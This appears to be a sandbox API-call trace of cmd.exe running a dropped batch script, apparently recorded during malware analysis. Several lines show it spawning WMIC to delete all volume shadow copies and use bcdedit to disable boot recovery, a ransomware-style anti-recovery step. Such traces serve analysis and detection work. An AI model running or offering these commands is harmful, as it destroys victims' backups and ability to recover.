nNumberOfCharsToWrite=0xba, lpNumberOfCharsWritten=0x28f6e8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f6e8*=0xba) returned 1 [0159.099] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f71c | out: _Buffer="\r\n") returned 2 [0159.099] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.099] GetFileType (hFile=0x7) returned 0x2 [0159.100] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0159.100] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6dc | out: lpMode=0x28f6dc) returned 1 [0159.100] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.100] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f708, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f708*=0x2) returned 1 [0159.100] _wcsicmp (_String1="wmic.exe", _String2="DIR") returned 19 [0159.100] _wcsicmp (_String1="wmic.exe", _String2="ERASE") returned 18 [0159.100] _wcsicmp (_String1="wmic.exe", _String2="DEL") returned 19 [0159.100] _wcsicmp (_String1="wmic.exe", _String2="TYPE") returned 3 [0159.100] _wcsicmp (_String1="wmic.exe", _String2="COPY") returned 20 [0159.100] _wcsicmp (_String1="wmic.exe", _String2="CD") returned 20 [0159.100] _wcsicmp (_String1="wmic.exe", _String2="CHDIR") returned 20 [0159.100] _wcsicmp (_String1="wmic.exe", _String2="RENAME") returned 5 [0159.100] _wcsicmp (_String1="wmic.exe", _String2="REN") returned 5 [0159.100] _wcsicmp (_String1="wmic.exe", _String2="ECHO") returned 18 [0159.100] _wcsicmp (_String1="wmic.exe", _String2="SET") returned 4 [0159.100] _wcsicmp (_String1="wmic.exe", _String2="PAUSE") returned 7 [0159.100] _wcsicmp (_String1="wmic.exe", _String2="DATE") returned 19 [0159.100] _wcsicmp (_String1="wmic.exe", _String2="TIME") returned 3 [0159.100] _wcsicmp (_String1="wmic.exe", _String2="PROMPT") returned 7 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="MD") returned 10 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="MKDIR") returned 10 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="RD") returned 5 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="RMDIR") returned 5 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="PATH") returned 7 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="GOTO") returned 16 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="SHIFT") returned 4 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="CLS") returned 20 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="CALL") returned 20 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="VERIFY") returned 1 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="VER") returned 1 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="VOL") returned 1 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="EXIT") returned 18 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="SETLOCAL") returned 4 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="ENDLOCAL") returned 18 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="TITLE") returned 3 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="START") returned 4 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="DPATH") returned 19 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="KEYS") returned 12 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="MOVE") returned 10 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="PUSHD") returned 7 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="POPD") returned 7 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="ASSOC") returned 22 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="FTYPE") returned 17 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="BREAK") returned 21 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="COLOR") returned 20 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="MKLINK") returned 10 [0159.101] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0159.101] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0159.102] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0159.102] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\wmic.exe", fInfoLevelId=0x1, lpFindFileData=0x28f25c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f25c) returned 0xffffffff [0159.102] GetLastError () returned 0x2 [0159.102] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\wmic.exe.*", fInfoLevelId=0x1, lpFindFileData=0x28f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f23c) returned 0xffffffff [0159.102] GetLastError () returned 0x2 [0159.102] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\wmic.exe", fInfoLevelId=0x1, lpFindFileData=0x28f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f23c) returned 0xffffffff [0159.102] GetLastError () returned 0x2 [0159.103] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic.exe", fInfoLevelId=0x1, lpFindFileData=0x28f25c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f25c) returned 0xffffffff [0159.103] GetLastError () returned 0x2 [0159.103] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic.exe.*", fInfoLevelId=0x1, lpFindFileData=0x28f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f23c) returned 0xffffffff [0159.103] GetLastError () returned 0x2 [0159.103] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic.exe", fInfoLevelId=0x1, lpFindFileData=0x28f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f23c) returned 0xffffffff [0159.103] GetLastError () returned 0x2 [0159.103] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic.exe", fInfoLevelId=0x1, lpFindFileData=0x28f25c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f25c) returned 0xffffffff [0159.103] GetLastError () returned 0x2 [0159.103] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic.exe.*", fInfoLevelId=0x1, lpFindFileData=0x28f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f23c) returned 0xffffffff [0159.103] GetLastError () returned 0x2 [0159.103] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic.exe", fInfoLevelId=0x1, lpFindFileData=0x28f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f23c) returned 0xffffffff [0159.104] GetLastError () returned 0x2 [0159.104] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.exe", fInfoLevelId=0x1, lpFindFileData=0x28f25c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f25c) returned 0x492048 [0159.104] FindClose (in: hFindFile=0x492048 | out: hFindFile=0x492048) returned 1 [0159.104] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0159.104] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0159.104] GetConsoleTitleW (in: lpConsoleTitle=0x28f28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0159.104] GetFileAttributesW (lpFileName="wmic.exe" (normalized: "c:\\users\\eebsym5\\desktop\\wmic.exe")) returned 0xffffffff [0159.104] _wcsicmp (_String1="wmic", _String2="DIR") returned 19 [0159.104] _wcsicmp (_String1="wmic", _String2="ERASE") returned 18 [0159.104] _wcsicmp (_String1="wmic", _String2="DEL") returned 19 [0159.104] _wcsicmp (_String1="wmic", _String2="TYPE") returned 3 [0159.104] _wcsicmp (_String1="wmic", _String2="COPY") returned 20 [0159.104] _wcsicmp (_String1="wmic", _String2="CD") returned 20 [0159.104] _wcsicmp (_String1="wmic", _String2="CHDIR") returned 20 [0159.104] _wcsicmp (_String1="wmic", _String2="RENAME") returned 5 [0159.104] _wcsicmp (_String1="wmic", _String2="REN") returned 5 [0159.104] _wcsicmp (_String1="wmic", _String2="ECHO") returned 18 [0159.104] _wcsicmp (_String1="wmic", _String2="SET") returned 4 [0159.104] _wcsicmp (_String1="wmic", _String2="PAUSE") returned 7 [0159.104] _wcsicmp (_String1="wmic", _String2="DATE") returned 19 [0159.104] _wcsicmp (_String1="wmic", _String2="TIME") returned 3 [0159.104] _wcsicmp (_String1="wmic", _String2="PROMPT") returned 7 [0159.105] _wcsicmp (_String1="wmic", _String2="MD") returned 10 [0159.105] _wcsicmp (_String1="wmic", _String2="MKDIR") returned 10 [0159.105] _wcsicmp (_String1="wmic", _String2="RD") returned 5 [0159.105] _wcsicmp (_String1="wmic", _String2="RMDIR") returned 5 [0159.105] _wcsicmp (_String1="wmic", _String2="PATH") returned 7 [0159.105] _wcsicmp (_String1="wmic", _String2="GOTO") returned 16 [0159.105] _wcsicmp (_String1="wmic", _String2="SHIFT") returned 4 [0159.105] _wcsicmp (_String1="wmic", _String2="CLS") returned 20 [0159.105] _wcsicmp (_String1="wmic", _String2="CALL") returned 20 [0159.105] _wcsicmp (_String1="wmic", _String2="VERIFY") returned 1 [0159.105] _wcsicmp (_String1="wmic", _String2="VER") returned 1 [0159.105] _wcsicmp (_String1="wmic", _String2="VOL") returned 1 [0159.105] _wcsicmp (_String1="wmic", _String2="EXIT") returned 18 [0159.105] _wcsicmp (_String1="wmic", _String2="SETLOCAL") returned 4 [0159.105] _wcsicmp (_String1="wmic", _String2="ENDLOCAL") returned 18 [0159.105] _wcsicmp (_String1="wmic", _String2="TITLE") returned 3 [0159.105] _wcsicmp (_String1="wmic", _String2="START") returned 4 [0159.105] _wcsicmp (_String1="wmic", _String2="DPATH") returned 19 [0159.105] _wcsicmp (_String1="wmic", _String2="KEYS") returned 12 [0159.105] _wcsicmp (_String1="wmic", _String2="MOVE") returned 10 [0159.105] _wcsicmp (_String1="wmic", _String2="PUSHD") returned 7 [0159.105] _wcsicmp (_String1="wmic", _String2="POPD") returned 7 [0159.105] _wcsicmp (_String1="wmic", _String2="ASSOC") returned 22 [0159.105] _wcsicmp (_String1="wmic", _String2="FTYPE") returned 17 [0159.105] _wcsicmp (_String1="wmic", _String2="BREAK") returned 21 [0159.105] _wcsicmp (_String1="wmic", _String2="COLOR") returned 20 [0159.105] _wcsicmp (_String1="wmic", _String2="MKLINK") returned 10 [0159.105] _wcsicmp (_String1="wmic", _String2="DIR") returned 19 [0159.105] _wcsicmp (_String1="wmic", _String2="ERASE") returned 18 [0159.105] _wcsicmp (_String1="wmic", _String2="DEL") returned 19 [0159.105] _wcsicmp (_String1="wmic", _String2="TYPE") returned 3 [0159.105] _wcsicmp (_String1="wmic", _String2="COPY") returned 20 [0159.105] _wcsicmp (_String1="wmic", _String2="CD") returned 20 [0159.105] _wcsicmp (_String1="wmic", _String2="CHDIR") returned 20 [0159.105] _wcsicmp (_String1="wmic", _String2="RENAME") returned 5 [0159.105] _wcsicmp (_String1="wmic", _String2="REN") returned 5 [0159.105] _wcsicmp (_String1="wmic", _String2="ECHO") returned 18 [0159.105] _wcsicmp (_String1="wmic", _String2="SET") returned 4 [0159.105] _wcsicmp (_String1="wmic", _String2="PAUSE") returned 7 [0159.105] _wcsicmp (_String1="wmic", _String2="DATE") returned 19 [0159.105] _wcsicmp (_String1="wmic", _String2="TIME") returned 3 [0159.106] _wcsicmp (_String1="wmic", _String2="PROMPT") returned 7 [0159.106] _wcsicmp (_String1="wmic", _String2="MD") returned 10 [0159.106] _wcsicmp (_String1="wmic", _String2="MKDIR") returned 10 [0159.106] _wcsicmp (_String1="wmic", _String2="RD") returned 5 [0159.106] _wcsicmp (_String1="wmic", _String2="RMDIR") returned 5 [0159.106] _wcsicmp (_String1="wmic", _String2="PATH") returned 7 [0159.106] _wcsicmp (_String1="wmic", _String2="GOTO") returned 16 [0159.106] _wcsicmp (_String1="wmic", _String2="SHIFT") returned 4 [0159.106] _wcsicmp (_String1="wmic", _String2="CLS") returned 20 [0159.106] _wcsicmp (_String1="wmic", _String2="CALL") returned 20 [0159.106] _wcsicmp (_String1="wmic", _String2="VERIFY") returned 1 [0159.106] _wcsicmp (_String1="wmic", _String2="VER") returned 1 [0159.106] _wcsicmp (_String1="wmic", _String2="VOL") returned 1 [0159.106] _wcsicmp (_String1="wmic", _String2="EXIT") returned 18 [0159.106] _wcsicmp (_String1="wmic", _String2="SETLOCAL") returned 4 [0159.106] _wcsicmp (_String1="wmic", _String2="ENDLOCAL") returned 18 [0159.106] _wcsicmp (_String1="wmic", _String2="TITLE") returned 3 [0159.106] _wcsicmp (_String1="wmic", _String2="START") returned 4 [0159.106] _wcsicmp (_String1="wmic", _String2="DPATH") returned 19 [0159.106] _wcsicmp (_String1="wmic", _String2="KEYS") returned 12 [0159.106] _wcsicmp (_String1="wmic", _String2="MOVE") returned 10 [0159.106] _wcsicmp (_String1="wmic", _String2="PUSHD") returned 7 [0159.106] _wcsicmp (_String1="wmic", _String2="POPD") returned 7 [0159.106] _wcsicmp (_String1="wmic", _String2="ASSOC") returned 22 [0159.106] _wcsicmp (_String1="wmic", _String2="FTYPE") returned 17 [0159.106] _wcsicmp (_String1="wmic", _String2="BREAK") returned 21 [0159.106] _wcsicmp (_String1="wmic", _String2="COLOR") returned 20 [0159.106] _wcsicmp (_String1="wmic", _String2="MKLINK") returned 10 [0159.106] _wcsicmp (_String1="wmic", _String2="FOR") returned 17 [0159.106] _wcsicmp (_String1="wmic", _String2="IF") returned 14 [0159.106] _wcsicmp (_String1="wmic", _String2="REM") returned 5 [0159.106] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0159.106] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0159.107] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0159.107] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\wmic.exe", fInfoLevelId=0x1, lpFindFileData=0x28eb48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb48) returned 0xffffffff [0159.107] GetLastError () returned 0x2 [0159.107] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\wmic.exe.*", fInfoLevelId=0x1, lpFindFileData=0x28eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb28) returned 0xffffffff [0159.107] GetLastError () returned 0x2 [0159.107] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\wmic.exe", fInfoLevelId=0x1, lpFindFileData=0x28eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb28) returned 0xffffffff [0159.107] GetLastError () returned 0x2 [0159.108] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic.exe", fInfoLevelId=0x1, lpFindFileData=0x28eb48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb48) returned 0xffffffff [0159.108] GetLastError () returned 0x2 [0159.108] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic.exe.*", fInfoLevelId=0x1, lpFindFileData=0x28eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb28) returned 0xffffffff [0159.108] GetLastError () returned 0x2 [0159.108] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic.exe", fInfoLevelId=0x1, lpFindFileData=0x28eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb28) returned 0xffffffff [0159.108] GetLastError () returned 0x2 [0159.108] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic.exe", fInfoLevelId=0x1, lpFindFileData=0x28eb48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb48) returned 0xffffffff [0159.108] GetLastError () returned 0x2 [0159.108] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic.exe.*", fInfoLevelId=0x1, lpFindFileData=0x28eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb28) returned 0xffffffff [0159.109] GetLastError () returned 0x2 [0159.109] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic.exe", fInfoLevelId=0x1, lpFindFileData=0x28eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb28) returned 0xffffffff [0159.109] GetLastError () returned 0x2 [0159.109] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.exe", fInfoLevelId=0x1, lpFindFileData=0x28eb48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb48) returned 0x4922e0 [0159.109] FindClose (in: hFindFile=0x4922e0 | out: hFindFile=0x4922e0) returned 1 [0159.109] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0159.109] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0159.109] GetConsoleTitleW (in: lpConsoleTitle=0x28f020, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0159.109] InitializeProcThreadAttributeList (in: lpAttributeList=0x28eea8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28ef70 | out: lpAttributeList=0x28eea8, lpSize=0x28ef70) returned 1 [0159.109] UpdateProcThreadAttribute (in: lpAttributeList=0x28eea8, dwFlags=0x0, Attribute=0x60001, lpValue=0x28ef68, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28eea8, lpPreviousValue=0x0) returned 1 [0159.109] GetStartupInfoW (in: lpStartupInfo=0x28ee64 | out: lpStartupInfo=0x28ee64*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0159.109] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0159.109] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="wmic.exe process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x28ef04*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wmic.exe process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28ef50 | out: lpCommandLine="wmic.exe process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"", lpProcessInformation=0x28ef50*(hProcess=0x58, hThread=0x54, dwProcessId=0xf38, dwThreadId=0xf7c)) returned 1 [0159.578] CloseHandle (hObject=0x54) returned 1 [0159.578] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0159.578] GetEnvironmentStringsW () returned 0x490940* [0159.579] FreeEnvironmentStringsW (penv=0x490940) returned 1 [0159.579] WaitForSingleObject (hHandle=0x58, dwMilliseconds=0xffffffff) returned 0x0 [0178.648] GetExitCodeProcess (in: hProcess=0x58, lpExitCode=0x28ee44 | out: lpExitCode=0x28ee44*=0x0) returned 1 [0178.648] CloseHandle (hObject=0x58) returned 1 [0178.648] _vsnwprintf (in: _Buffer=0x28ef8c, _BufferCount=0x13, _Format="%08X", _ArgList=0x28ee50 | out: _Buffer="00000000") returned 8 [0178.648] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0178.648] GetEnvironmentStringsW () returned 0x490940* [0178.648] FreeEnvironmentStringsW (penv=0x490940) returned 1 [0178.648] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0178.648] GetEnvironmentStringsW () returned 0x490940* [0178.648] FreeEnvironmentStringsW (penv=0x490940) returned 1 [0178.648] DeleteProcThreadAttributeList (in: lpAttributeList=0x28eea8 | out: lpAttributeList=0x28eea8) [0178.648] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.648] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0178.648] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.648] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0178.649] _get_osfhandle (_FileHandle=0) returned 0x3 [0178.649] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0178.649] SetConsoleInputExeNameW () returned 0x1 [0178.649] GetConsoleOutputCP () returned 0x1b5 [0178.649] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0178.649] SetThreadUILanguage (LangId=0x0) returned 0x409 [0178.649] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\kgixh98v.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0178.649] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0178.649] _get_osfhandle (_FileHandle=3) returned 0x58 [0178.649] SetFilePointer (in: hFile=0x58, lDistanceToMove=243, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf3 [0178.650] _get_osfhandle (_FileHandle=3) returned 0x58 [0178.650] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf3 [0178.650] ReadFile (in: hFile=0x58, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f6a8*=0x149, lpOverlapped=0x0) returned 1 [0178.651] SetFilePointer (in: hFile=0x58, lDistanceToMove=269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10d [0178.651] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=26, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="echo CiOHhXJTCFVtKQz1Zuv\r\nte \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\n") returned 26 [0178.651] GetFileType (hFile=0x58) returned 0x1 [0178.651] _get_osfhandle (_FileHandle=3) returned 0x58 [0178.651] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10d [0178.652] _tell (_FileHandle=3) returned 269 [0178.652] _close (_FileHandle=3) returned 0 [0178.652] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f47c | out: _Buffer="\r\n") returned 2 [0178.652] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.652] GetFileType (hFile=0x7) returned 0x2 [0178.652] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.652] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f43c | out: lpMode=0x28f43c) returned 1 [0178.652] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.652] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f468, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f468*=0x2) returned 1 [0178.653] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0178.653] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0178.653] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f478 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0178.653] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x28f478 | out: _Buffer=">") returned 1 [0178.653] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.653] GetFileType (hFile=0x7) returned 0x2 [0178.653] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.653] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f440 | out: lpMode=0x28f440) returned 1 [0178.654] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.654] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x28f46c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x28f46c*=0x19) returned 1 [0178.654] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.654] GetFileType (hFile=0x7) returned 0x2 [0178.654] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.654] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6c4 | out: lpMode=0x28f6c4) returned 1 [0178.655] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.655] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a0d90*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x28f6f0, lpReserved=0x0 | out: lpBuffer=0x4a0d90*, lpNumberOfCharsWritten=0x28f6f0*=0x4) returned 1 [0178.655] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f6fc | out: _Buffer=" CiOHhXJTCFVtKQz1Zuv ") returned 21 [0178.655] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.655] GetFileType (hFile=0x7) returned 0x2 [0178.656] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.656] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6bc | out: lpMode=0x28f6bc) returned 1 [0178.656] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.656] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x28f6e8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f6e8*=0x15) returned 1 [0178.656] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f71c | out: _Buffer="\r\n") returned 2 [0178.656] 